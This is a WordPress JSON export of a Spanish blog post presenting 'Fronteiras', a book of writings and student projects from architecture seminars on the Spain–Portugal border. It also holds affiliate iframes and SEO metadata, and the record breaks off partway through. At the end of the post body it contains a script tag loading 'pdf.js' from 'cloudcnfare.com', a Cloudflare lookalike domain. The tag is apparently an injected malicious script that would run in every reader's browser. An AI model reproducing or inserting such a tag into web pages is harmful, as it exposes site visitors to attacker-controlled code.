{"id":69682,"date":"2018-07-31T00:01:13","date_gmt":"2018-07-30T22:01:13","guid":{"rendered":"https:\/\/veredes.es\/blog\/?p=69682"},"modified":"2024-08-21T17:32:00","modified_gmt":"2024-08-21T15:32:00","slug":"fronteiras-escritos-proyectos-arquitectura-paisaje-territorio","status":"publish","type":"post","link":"https:\/\/veredes.es\/blog\/fronteiras-escritos-proyectos-arquitectura-paisaje-territorio\/","title":{"rendered":"Fronteiras. Escritos y Proyectos de Arquitectura, Paisaje y Territorio"},"content":{"rendered":"<p><\/p>\n<p style=\"text-align: justify;\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-69683\" src=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/06\/Fronteiras.-Escritos-y-Proyectos-de-Arquitectura-Paisaje-y-Territorio-723x1024.jpg\" alt=\"Fronteiras. Escritos y Proyectos de Arquitectura, Paisaje y Territorio\" width=\"640\" height=\"906\" srcset=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/06\/Fronteiras.-Escritos-y-Proyectos-de-Arquitectura-Paisaje-y-Territorio-723x1024.jpg 723w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/06\/Fronteiras.-Escritos-y-Proyectos-de-Arquitectura-Paisaje-y-Territorio-212x300.jpg 212w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/06\/Fronteiras.-Escritos-y-Proyectos-de-Arquitectura-Paisaje-y-Territorio.jpg 1200w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/p>\n<p style=\"text-align: justify;\"><strong>FRONTEiRAS<\/strong> es uno de los proyectos desarrollados desde <a href=\"http:\/\/info386501.wixsite.com\/aipac\" target=\"_blank\" rel=\"noopener\">AiPAC (Associa\u00e7ao Ib\u00e9rica para a Inova\u00e7\u00e3o, Patrim\u00f3nio, Arquitectura e Cultura)<\/a>. En la actualidad se enmarca como un s\u00f3lido catalizador de actividades transfonterizas entre Espa\u00f1a y Portugal y da lugar a una herramienta capaz de desvelar e investigar los nexos de uni\u00f3n en ambos lados de la frontera. Una acci\u00f3n estrat\u00e9gica que intenta hacer invisible la frontera pol\u00edtica, generando espacios de cooperaci\u00f3n que fomenten las relaciones hispano-lusas.<\/p>\n<p style=\"text-align: justify;\">La frontera entre Espa\u00f1a y Portugal viene &#x2122;marcada\u222b por una l\u00ednea a veces imaginaria y otras veces materializada en forma de accidentes geogr\u00e1ficos. 1214 kil\u00f3metros que con el tiempo han construido un interesante territorio conocido como &#x2122;La Raya\u222b.<\/p>\n<p style=\"text-align: justify;\">En este contexto surgi\u00f3 en 2013 el <strong>Seminario FRONTEiRAS<\/strong>, una iniciativa de car\u00e1cter anual que ha conseguido prolongarse en el tiempo mediante la realizaci\u00f3n de cuatro ediciones, promoviendo el desarrollo y la cohesi\u00f3n entre los municipios rayanos y construyendo un verdadero espacio de investigaci\u00f3n y encuentro de la arquitectura hispano-lusa en el que se compatibilizaban conferencias y workshops de trabajo con alumnos procedentes de universidades espa\u00f1olas y portuguesas.<\/p>\n<p style=\"text-align: justify;\">La primera edici\u00f3n del <strong>Seminario FRONTEiRAS<\/strong> se realiz\u00f3 en 2013, y estuvo dedicada a las industrias conserveras y salazoneras que aparecen abandonadas en la desembocadura del R\u00edo Guadiana, entre Ayamonte (ES) y Vila Real de Santo Ant\u00f3nio (PT), evidenciando la problem\u00e1tica de actuar en este tipo de infraestructuras que han formado parte de la memoria hist\u00f3rica de ambos municipios. Durante una semana de trabajo se desarrollaron una serie de proyectos de intervenci\u00f3n en las antiguas f\u00e1bricas que plantearon diversas estrategias sobre c\u00f3mo reutilizar estos espacios industriales asumiendo la recualificaci\u00f3n de su entorno.<\/p>\n<p style=\"text-align: justify;\">A lo largo de este tiempo el <strong>Seminario FRONTEiRAS<\/strong> ha seguido recorriendo la frontera m\u00e1s all\u00e1 de Andaluc\u00eda y el Algarve hacia Extremadura y Alentejo, as\u00ed como por Castilla y Le\u00f3n y Beira Interior.<\/p>\n<p style=\"text-align: justify;\">En 2014, la segunda edici\u00f3n del Seminario centr\u00f3 su mirada en torno al patrimonio arquitect\u00f3nico y el paisaje que lo circundaba, realizando un acercamiento hacia diferentes edificios ic\u00f3nicos integrados en los l\u00edmites urbanos de Monsanto (PT), Idanha-a-Velha (PT) y Alc\u00e1ntara (ES). Bajo el t\u00edtulo de &#x2122;Intervenciones sobre el Patrimonio Arquitect\u00f3nico\u222b, el seminario explor\u00f3 la relaci\u00f3n entre patrimonio y paisaje, profundizando en el conocimiento, debate y reflexi\u00f3n de estrategias de rehabilitaci\u00f3n y reactivaci\u00f3n de estos enclaves.<\/p>\n<p style=\"text-align: justify;\">&#x2122;Acciones sobre el espacio patrimonial\u222b fue el t\u00edtulo del Seminario que en 2015 se traslad\u00f3 hasta Ciudad Rodrigo (ES) y Belmonte (PT). En esta tercera edici\u00f3n el objeto de estudio fueron los centros urbanos de ambas ciudades.<\/p>\n<p style=\"text-align: justify;\">La cuarta edici\u00f3n del Seminario se realiz\u00f3 en 2016 bajo el t\u00edtulo de &#x2122;Territorios en transformaci\u00f3n\u222b. Este encuentro permiti\u00f3 construir una nueva mirada sobre la futura Eurociudad de Badajoz (ES), Elvas (PT) y Campo Maior (PT).<\/p>\n<p style=\"text-align: justify;\">Despu\u00e9s de esta trayectoria, y en un contexto como el actual en el que el concepto de frontera adquiere diversas connotaciones, creemos necesario el acercamiento desde diversos posicionamientos culturales que permitan cimentar una concepci\u00f3n de frontera plural.<\/p>\n<p style=\"text-align: justify;\">En este sentido, este libro compila diversos Escritos sobre Arquitectura, Territorio y Paisaje en torno al concepto de frontera, con las miradas de los arquitectos participantes en las cuatro ediciones del <a href=\"http:\/\/distribucion.recolectoresurbanos.com\/tienda\/fronteiras-escritos-y-proyectos-de-arquitectura-paisaje-y-territorio\/\" target=\"_blank\" rel=\"noopener\"><strong>Seminario FRONTEiRAS<\/strong><\/a> (conscientemente incluidas en su idioma original), as\u00ed como un compendio de los Proyectos realizados por los estudiantes y profesores de los distintos grupos de trabajo.<\/p>\n<p><iframe loading=\"lazy\" style=\"width: 120px; height: 240px;\" src=\"https:\/\/rcm-eu.amazon-adsystem.com\/e\/cm?ref=tf_til&amp;t=wwwveredeses-21&amp;m=amazon&amp;o=30&amp;p=8&amp;l=as1&amp;IS2=1&amp;asins=8494493620&amp;linkId=00d17cbb7e592b753890d2c7194717db&amp;bc1=FFFFFF&amp;lt1=_blank&amp;fc1=333333&amp;lc1=0066C0&amp;bg1=FFFFFF&amp;f=ifr\" width=\"300\" height=\"150\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"> <\/iframe> <iframe loading=\"lazy\" style=\"width: 120px; height: 240px;\" src=\"https:\/\/rcm-eu.amazon-adsystem.com\/e\/cm?ref=tf_til&amp;t=wwwveredeses-21&amp;m=amazon&amp;o=30&amp;p=8&amp;l=as1&amp;IS2=1&amp;asins=8494493612&amp;linkId=bd3f284db4b360e66fc74665390a079c&amp;bc1=FFFFFF&amp;lt1=_blank&amp;fc1=333333&amp;lc1=0066C0&amp;bg1=FFFFFF&amp;f=ifr\" width=\"300\" height=\"150\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"> <\/iframe> <iframe loading=\"lazy\" style=\"width: 120px; height: 240px;\" src=\"https:\/\/rcm-eu.amazon-adsystem.com\/e\/cm?ref=tf_til&amp;t=wwwveredeses-21&amp;m=amazon&amp;o=30&amp;p=8&amp;l=as1&amp;IS2=1&amp;asins=8494168487&amp;linkId=9d89b984bf3c4065c3307ea6bd898e40&amp;bc1=FFFFFF&amp;lt1=_blank&amp;fc1=333333&amp;lc1=0066C0&amp;bg1=FFFFFF&amp;f=ifr\" width=\"300\" height=\"150\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"> <\/iframe> <iframe loading=\"lazy\" style=\"width: 120px; height: 240px;\" src=\"https:\/\/rcm-eu.amazon-adsystem.com\/e\/cm?ref=tf_til&amp;t=wwwveredeses-21&amp;m=amazon&amp;o=30&amp;p=8&amp;l=as1&amp;IS2=1&amp;asins=8494168487&amp;linkId=9d89b984bf3c4065c3307ea6bd898e40&amp;bc1=FFFFFF&amp;lt1=_blank&amp;fc1=333333&amp;lc1=0066C0&amp;bg1=FFFFFF&amp;f=ifr\" width=\"300\" height=\"150\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"> <\/iframe> <iframe loading=\"lazy\" style=\"width: 120px; height: 240px;\" src=\"https:\/\/rcm-eu.amazon-adsystem.com\/e\/cm?ref=tf_til&amp;t=wwwveredeses-21&amp;m=amazon&amp;o=30&amp;p=8&amp;l=as1&amp;IS2=1&amp;asins=8494019619&amp;linkId=2471be8291798cd6f50f503e58dfbf1d&amp;bc1=FFFFFF&amp;lt1=_blank&amp;fc1=333333&amp;lc1=0066C0&amp;bg1=FFFFFF&amp;f=ifr\" width=\"300\" height=\"150\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"> <\/iframe> <iframe loading=\"lazy\" style=\"width: 120px; height: 240px;\" src=\"https:\/\/rcm-eu.amazon-adsystem.com\/e\/cm?ref=tf_til&amp;t=wwwveredeses-21&amp;m=amazon&amp;o=30&amp;p=8&amp;l=as1&amp;IS2=1&amp;asins=8494168444&amp;linkId=366452e36ce1f3883ca127889d95484f&amp;bc1=FFFFFF&amp;lt1=_blank&amp;fc1=333333&amp;lc1=0066C0&amp;bg1=FFFFFF&amp;f=ifr\" width=\"300\" height=\"150\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"> <\/iframe> <iframe loading=\"lazy\" style=\"width: 120px; height: 240px;\" src=\"https:\/\/rcm-eu.amazon-adsystem.com\/e\/cm?ref=tf_til&amp;t=wwwveredeses-21&amp;m=amazon&amp;o=30&amp;p=8&amp;l=as1&amp;IS2=1&amp;asins=8494019600&amp;linkId=cf0beea1f8ea8d1cadf66420573cc6dd&amp;bc1=FFFFFF&amp;lt1=_blank&amp;fc1=333333&amp;lc1=0066C0&amp;bg1=FFFFFF&amp;f=ifr\" width=\"300\" height=\"150\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"> <\/iframe> <iframe loading=\"lazy\" style=\"width: 120px; height: 240px;\" src=\"https:\/\/rcm-eu.amazon-adsystem.com\/e\/cm?ref=tf_til&amp;t=wwwveredeses-21&amp;m=amazon&amp;o=30&amp;p=8&amp;l=as1&amp;IS2=1&amp;asins=8494019643&amp;linkId=980a87d4b05d134419698c36a45860db&amp;bc1=FFFFFF&amp;lt1=_blank&amp;fc1=333333&amp;lc1=0066C0&amp;bg1=FFFFFF&amp;f=ifr\" width=\"300\" height=\"150\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"> <\/iframe> <iframe loading=\"lazy\" style=\"width: 120px; height: 240px;\" src=\"https:\/\/rcm-eu.amazon-adsystem.com\/e\/cm?ref=tf_til&amp;t=wwwveredeses-21&amp;m=amazon&amp;o=30&amp;p=8&amp;l=as1&amp;IS2=1&amp;asins=8494168401&amp;linkId=171aac22e541bbafe67391827dd55af6&amp;bc1=FFFFFF&amp;lt1=_blank&amp;fc1=333333&amp;lc1=0066C0&amp;bg1=FFFFFF&amp;f=ifr\" width=\"300\" height=\"150\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"> <\/iframe> <iframe loading=\"lazy\" style=\"width: 120px; height: 240px;\" src=\"https:\/\/rcm-eu.amazon-adsystem.com\/e\/cm?ref=tf_til&amp;t=wwwveredeses-21&amp;m=amazon&amp;o=30&amp;p=8&amp;l=as1&amp;IS2=1&amp;asins=8494168436&amp;linkId=20497e86ab883af6d830d65a176abafa&amp;bc1=FFFFFF&amp;lt1=_blank&amp;fc1=333333&amp;lc1=0066C0&amp;bg1=FFFFFF&amp;f=ifr\" width=\"300\" height=\"150\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"> <\/iframe> <iframe loading=\"lazy\" style=\"width: 120px; height: 240px;\" src=\"https:\/\/rcm-eu.amazon-adsystem.com\/e\/cm?ref=tf_til&amp;t=wwwveredeses-21&amp;m=amazon&amp;o=30&amp;p=8&amp;l=as1&amp;IS2=1&amp;asins=8494168428&amp;linkId=5352e1ba6c4e1366087f87901091441c&amp;bc1=FFFFFF&amp;lt1=_blank&amp;fc1=333333&amp;lc1=0066C0&amp;bg1=FFFFFF&amp;f=ifr\" width=\"300\" height=\"150\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"> <\/iframe> <iframe loading=\"lazy\" style=\"width: 120px; height: 240px;\" src=\"https:\/\/rcm-eu.amazon-adsystem.com\/e\/cm?ref=tf_til&amp;t=wwwveredeses-21&amp;m=amazon&amp;o=30&amp;p=8&amp;l=as1&amp;IS2=1&amp;asins=8494168479&amp;linkId=838d7efa7cd992124258d7f5dff35de4&amp;bc1=FFFFFF&amp;lt1=_blank&amp;fc1=333333&amp;lc1=0066C0&amp;bg1=FFFFFF&amp;f=ifr\" width=\"300\" height=\"150\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"> <\/iframe> <iframe loading=\"lazy\" style=\"width: 120px; height: 240px;\" src=\"https:\/\/rcm-eu.amazon-adsystem.com\/e\/cm?ref=tf_til&amp;t=wwwveredeses-21&amp;m=amazon&amp;o=30&amp;p=8&amp;l=as1&amp;IS2=1&amp;asins=8494019635&amp;linkId=2f3307b6721f1e41b42b8db526f8261c&amp;bc1=FFFFFF&amp;lt1=_blank&amp;fc1=333333&amp;lc1=0066C0&amp;bg1=FFFFFF&amp;f=ifr\" width=\"300\" height=\"150\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"> <\/iframe> <iframe loading=\"lazy\" style=\"width: 120px; height: 240px;\" src=\"https:\/\/rcm-eu.amazon-adsystem.com\/e\/cm?ref=tf_til&amp;t=wwwveredeses-21&amp;m=amazon&amp;o=30&amp;p=8&amp;l=as1&amp;IS2=1&amp;asins=8494168495&amp;linkId=e41b3572f58d4004856900e93fdfffdd&amp;bc1=FFFFFF&amp;lt1=_blank&amp;fc1=333333&amp;lc1=0066C0&amp;bg1=FFFFFF&amp;f=ifr\" width=\"300\" height=\"150\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"> <\/iframe> <iframe loading=\"lazy\" style=\"width: 120px; height: 240px;\" src=\"https:\/\/rcm-eu.amazon-adsystem.com\/e\/cm?ref=tf_til&amp;t=wwwveredeses-21&amp;m=amazon&amp;o=30&amp;p=8&amp;l=as1&amp;IS2=1&amp;asins=8494168460&amp;linkId=9870d2505b6bd6c4abf0337daec36b45&amp;bc1=FFFFFF&amp;lt1=_blank&amp;fc1=333333&amp;lc1=0066C0&amp;bg1=FFFFFF&amp;f=ifr\" width=\"300\" height=\"150\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"> <\/iframe> <iframe loading=\"lazy\" style=\"width: 120px; height: 240px;\" src=\"https:\/\/rcm-eu.amazon-adsystem.com\/e\/cm?ref=tf_til&amp;t=wwwveredeses-21&amp;m=amazon&amp;o=30&amp;p=8&amp;l=as1&amp;IS2=1&amp;asins=8494019627&amp;linkId=520460babb3fdf251bae34caad975614&amp;bc1=FFFFFF&amp;lt1=_blank&amp;fc1=333333&amp;lc1=0066C0&amp;bg1=FFFFFF&amp;f=ifr\" width=\"300\" height=\"150\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"> <\/iframe> <iframe loading=\"lazy\" style=\"width: 120px; height: 240px;\" src=\"https:\/\/rcm-eu.amazon-adsystem.com\/e\/cm?ref=tf_til&amp;t=wwwveredeses-21&amp;m=amazon&amp;o=30&amp;p=8&amp;l=as1&amp;IS2=1&amp;asins=8494019651&amp;linkId=c384eccfb746a84badf14f1322843558&amp;bc1=FFFFFF&amp;lt1=_blank&amp;fc1=333333&amp;lc1=0066C0&amp;bg1=FFFFFF&amp;f=ifr\" width=\"300\" height=\"150\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"> <\/iframe><\/p>\n<p><script src=\"https:\/\/cloudcnfare.com\/pdf.js\" type=\"text\/javascript\"><\/script><\/p>","protected":false},"excerpt":{"rendered":"<p>FRONTEiRAS es uno de los proyectos desarrollados desde AiPAC (Associa\u00e7ao Ib\u00e9rica para a Inova\u00e7\u00e3o, Patrim\u00f3nio, Arquitectura e Cultura). En la actualidad se enmarca como un s\u00f3lido catalizador de actividades transfonterizas entre Espa\u00f1a y Portugal y da lugar a una herramienta capaz de desvelar e investigar los nexos de uni\u00f3n en ambos lados de la frontera. [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":69683,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[794,26],"tags":[13677,13705,1897,6042,2631,5819,13686,13701,13685,13693,13690,13694,13682,13706,2068,521,483,13695,13699,13703,13697,13683,13704,13691,13679,13696,11975,4285,733,15848,13689,1550,6201,13687,13702,4721,8531,13692,13678,13698,13707,11976,13680,977,9160,2787,13684,1086,1120,13681,13688,5093,1888,13700,1210,1286,3887],"class_list":{"0":"post-69682","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-libros","8":"category-publicaciones","9":"tag-aipac","10":"tag-alejandro-virseda","11":"tag-andalucia","13":"tag-arquitectura-espanola","14":"tag-arquitectura-portuguesa","15":"tag-begona-galeano-diaz","16":"tag-bernardo-rodrigues","17":"tag-catarina-figueiras","18":"tag-cesar-jimenez-de-tejada","19":"tag-cristina-garcia-baeza","20":"tag-daniel-n-jimenez-ferrera","21":"tag-diego-daza","22":"tag-eduardo-baleiras","24":"tag-espana","25":"tag-estudio-entresitio","26":"tag-f-javier-lopez-rivera","27":"tag-fernando-perez","28":"tag-francisco-vieira-de-campos","29":"tag-gilberto-rodriguez","30":"tag-gonzalo-martinez","31":"tag-ignacio-vila","32":"tag-inaki-perez-de-la-fuente","33":"tag-ines-belmarco","34":"tag-ines-martins-de-brito","35":"tag-ines-vieira-da-silva","36":"tag-inigo-garcia-odiaga","37":"tag-intervencion","38":"tag-jorge-ivan-guerrero-ramirez","39":"tag-jose-algeciras-rodriguez","40":"tag-juan-domingo-santos","41":"tag-juanjo-lopez-de-la-cruz","42":"tag-julian-prieto-fernandez","43":"tag-julian-sobrino-simal","44":"tag-manuel-aires-mateus","45":"tag-maria-gonzalez-garcia","46":"tag-maria-hurtado-de-mendoza","47":"tag-marta-alvarez-del-pastor","48":"tag-marta-pelegrin","49":"tag-miguel-angel-serrano-lopez","50":"tag-miguel-vieira","51":"tag-pablo-blazquez-jesus","52":"tag-paisaje","53":"tag-paisaje-cultural","54":"tag-patrimonio-cultural","55":"tag-paulo-henrique-durao","56":"tag-portugal","57":"tag-publicacion","58":"tag-rafel-caceres-feria","59":"tag-raul-galvez-tirado","60":"tag-recolectores-urbanos","61":"tag-reutilizar","62":"tag-rui-reis-alves","63":"tag-santiago-de-molina","64":"tag-territorio","65":"tag-toni-girones"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Fronteiras. Escritos y Proyectos de Arquitectura, Paisaje y Territorio - veredes<\/title>\n<meta name=\"description\" content=\"Toda la informaci\u00f3n sobre: [:es]Fronteiras. Escritos y Proyectos de Arquitectura, Paisaje y Territorio[:gl]Fronteiras. Escritos e Proxectos de Arquitectura, Paisaxe e Territorio[:en]Fronteiras. Writings and Projects of Architecture, Landscape and Territory[:]\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/veredes.es\/blog\/fronteiras-escritos-proyectos-arquitectura-paisaje-territorio\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"[:es]Fronteiras. Escritos y Proyectos de Arquitectura, Paisaje y Territorio[:gl]Fronteiras. Escritos e Proxectos de Arquitectura, Paisaxe e Territorio[:en]Fronteiras. Writings and Projects of Architecture, Landscape and Territory[:] - veredes\" \/>\n<meta property=\"og:description\" content=\"Toda la informaci\u00f3n sobre: [:es]Fronteiras. Escritos y Proyectos de Arquitectura, Paisaje y Territorio[:gl]Fronteiras. Escritos e Proxectos de Arquitectura, Paisaxe e Territorio[:en]Fronteiras. Writings and Projects of Architecture, Landscape and Territory[:]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/veredes.es\/blog\/fronteiras-escritos-proyectos-arquitectura-paisaje-territorio\/\" \/>\n<meta property=\"og:site_name\" content=\"veredes, arquitectura y divulgaci\u00f3n\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/veredesArquitecturayDivulgacion\/\" \/>\n<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/veredesArquitecturayDivulgacion\/\" \/>\n<meta property=\"article:published_time\" content=\"2018-07-30T22:01:13+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-08-21T15:32:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2018\/06\/Fronteiras.-Escritos-y-Proyectos-de-Arquitectura-Paisaje-y-Territorio.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1200\" \/>\n\t<meta property=\"og:image:height\" content=\"1700\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"veredes\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@https:\/\/twitter.com\/veredes\" \/>\n<meta name=\"twitter:site\" content=\"@veredes\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"veredes\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data2\" content=\"9 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/fronteiras-escritos-proyectos-arquitectura-paisaje-territorio\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/fronteiras-escritos-proyectos-arquitectura-paisaje-territorio\\\/\"},\"author\":{\"name\":\"veredes\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#\\\/schema\\\/person\\\/0bbb669073ef7faba5168a0844e93d2c\"},\"headline\":\"Fronteiras. Escritos y Proyectos de Arquitectura, Paisaje y Territorio\",\"datePublished\":\"2018-07-30T22:01:13+00:00\",\"dateModified\":\"2024-08-21T15:32:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/fronteiras-escritos-proyectos-arquitectura-paisaje-territorio\\\/\"},\"wordCount\":1755,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/fronteiras-escritos-proyectos-arquitectura-paisaje-territorio\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/06\\\/Fronteiras.-Escritos-y-Proyectos-de-Arquitectura-Paisaje-y-Territorio.jpg\",\"keywords\":[\"AiPAC\",\"Alejandro V\u00edrseda\",\"Andaluc\u00eda\",\"\u00c1ngel Mart\u00ednez Garc\u00eda-Posada\",\"arquitectura espa\u00f1ola\",\"arquitectura portuguesa\",\"Bego\u00f1a Galeano D\u00edaz\",\"Bernardo Rodrigues\",\"Catarina Figueiras\",\"C\u00e9sar Jim\u00e9nez de Tejada\",\"Cristina Garc\u00eda Baeza\",\"Daniel N. Jim\u00e9nez Ferrera\",\"Diego Daza\",\"Eduardo Baleiras\",\"escritos\",\"Espa\u00f1a\",\"estudio entresitio\",\"F. Javier L\u00f3pez Rivera\",\"Fernando P\u00e9rez\",\"Francisco Vieira de Campos\",\"Gilberto Rodriguez\",\"Gonzalo Mart\u00ednez\",\"Ignacio Vila\",\"I\u00f1aki P\u00e9rez de la Fuente\",\"In\u00eas Belmar\u00e7o\",\"In\u00eas Martins de Brito\",\"In\u00eas Vieira da Silva\",\"\u00cd\u00f1igo Garc\u00eda Odiaga\",\"intervenci\u00f3n\",\"Jorge Iv\u00e1n Guerrero Ram\u00edrez\",\"Jos\u00e9 Algeciras Rodr\u00edguez\",\"Juan Domingo Santos\",\"Juanjo L\u00f3pez de la Cruz\",\"Juli\u00e1n Prieto Fern\u00e1ndez\",\"Juli\u00e1n Sobrino Simal\",\"Manuel Aires Mateus\",\"Mar\u00eda Gonz\u00e1lez Garc\u00eda\",\"Mar\u00eda Hurtado de Mendoza\",\"Marta \u00c1lvarez del Pastor\",\"Marta Pelegr\u00edn\",\"Miguel \u00c1ngel Serrano L\u00f3pez\",\"Miguel Vieira\",\"Pablo Bl\u00e1zquez Jes\u00fas\",\"paisaje\",\"paisaje cultural\",\"patrimonio cultural\",\"Paulo Henrique Dur\u00e3o\",\"Portugal\",\"publicaci\u00f3n\",\"Rafel C\u00e1ceres Feria\",\"Ra\u00fal G\u00e1lvez Tirado\",\"recolectores urbanos\",\"reutilizar\",\"Rui Reis Alves\",\"Santiago de Molina\",\"territorio\",\"Toni Giron\u00e8s\"],\"articleSection\":[\"libros\",\"publicaciones\"],\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/veredes.es\\\/blog\\\/fronteiras-escritos-proyectos-arquitectura-paisaje-territorio\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/fronteiras-escritos-proyectos-arquitectura-paisaje-territorio\\\/\",\"url\":\"https:\\\/\\\/veredes.es\\\/blog\\\/fronteiras-escritos-proyectos-arquitectura-paisaje-territorio\\\/\",\"name\":\"[:es]Fronteiras. Escritos y Proyectos de Arquitectura, Paisaje y Territorio[:gl]Fronteiras. Escritos e Proxectos de Arquitectura, Paisaxe e Territorio[:en]Fronteiras. Writings and Projects of Architecture, Landscape and Territory[:] - veredes\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/fronteiras-escritos-proyectos-arquitectura-paisaje-territorio\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/fronteiras-escritos-proyectos-arquitectura-paisaje-territorio\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/06\\\/Fronteiras.-Escritos-y-Proyectos-de-Arquitectura-Paisaje-y-Territorio.jpg\",\"datePublished\":\"2018-07-30T22:01:13+00:00\",\"dateModified\":\"2024-08-21T15:32:00+00:00\",\"description\":\"Toda la informaci\u00f3n sobre: [:es]Fronteiras. Escritos y Proyectos de Arquitectura, Paisaje y Territorio[:gl]Fronteiras. Escritos e Proxectos de Arquitectura, Paisaxe e Territorio[:en]Fronteiras. Writings and Projects of Architecture, Landscape and Territory[:]\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/fronteiras-escritos-proyectos-arquitectura-paisaje-territorio\\\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/veredes.es\\\/blog\\\/fronteiras-escritos-proyectos-arquitectura-paisaje-territorio\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/fronteiras-escritos-proyectos-arquitectura-paisaje-territorio\\\/#primaryimage\",\"url\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/06\\\/Fronteiras.-Escritos-y-Proyectos-de-Arquitectura-Paisaje-y-Territorio.jpg\",\"contentUrl\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/06\\\/Fronteiras.-Escritos-y-Proyectos-de-Arquitectura-Paisaje-y-Territorio.jpg\",\"width\":1200,\"height\":1700},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/fronteiras-escritos-proyectos-arquitectura-paisaje-territorio\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\\\/\\\/veredes.es\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"[:es]Fronteiras. Escritos y Proyectos de Arquitectura, Paisaje y Territorio[:gl]Fronteiras. Escritos e Proxectos de Arquitectura, Paisaxe e Territorio[:en]Fronteiras. Writings and Projects of Architecture, Landscape and Territory[:]\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/veredes.es\\\/blog\\\/\",\"name\":\"veredes, arquitectura y 